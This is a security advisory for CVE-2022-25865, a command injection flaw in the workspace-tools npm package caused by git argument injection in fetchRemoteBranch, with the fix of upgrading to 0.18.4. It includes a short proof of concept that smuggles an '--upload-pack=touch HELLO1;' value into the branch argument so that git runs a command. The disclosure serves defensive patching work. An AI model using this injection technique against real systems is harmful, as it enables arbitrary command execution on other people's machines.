Command Injection Affecting workspace-tools package, versions <0.18.4
Exploit Maturity: Proof of concept
Attack Complexity: High
Confidentiality: High
Integrity: High
Availability: High
snyk-id: SNYK-JS-WORKSPACETOOLS-2421201
published: 11 May 2022
disclosed: 11 Mar 2022
credit: Alessio Della Libera of Snyk Research Team
Introduced: 11 Mar 2022
CVE-2022-25865
How to fix?
Upgrade workspace-tools to version 0.18.4 or higher.
Overview
workspace-tools is a set of JS monorepo workspace tools.
Affected versions of this package are vulnerable to Command Injection via git argument injection. When the fetchRemoteBranch(remote: string, remoteBranch: string, cwd: string) function is called, both the remote and remoteBranch parameters are passed to the git fetch subcommand without being separated from git's option parsing, so a value that begins with a dash is treated as an additional flag. A flag such as --upload-pack, which names a command for git to run, can then be used to perform command injection.
PoC
const workspace_tools = require("workspace-tools");
workspace_tools.init("./", "username", "password") // or git init
let remote1 = "origin";
let remoteBranch1 = "--upload-pack=touch HELLO1;";
workspace_tools.fetchRemoteBranch(remote1, remoteBranch1, "./") // git [ 'fetch', 'origin', '--upload-pack=touch HELLO1;' ]
// let remote2 = "--upload-pack=touch HELLO2;";
// let remoteBranch2 = "foo";
// workspace_tools.fetchRemoteBranch(remote2, remoteBranch2, "./") // git [ 'fetch', '--upload-pack=touch HELLO2;', 'foo' ]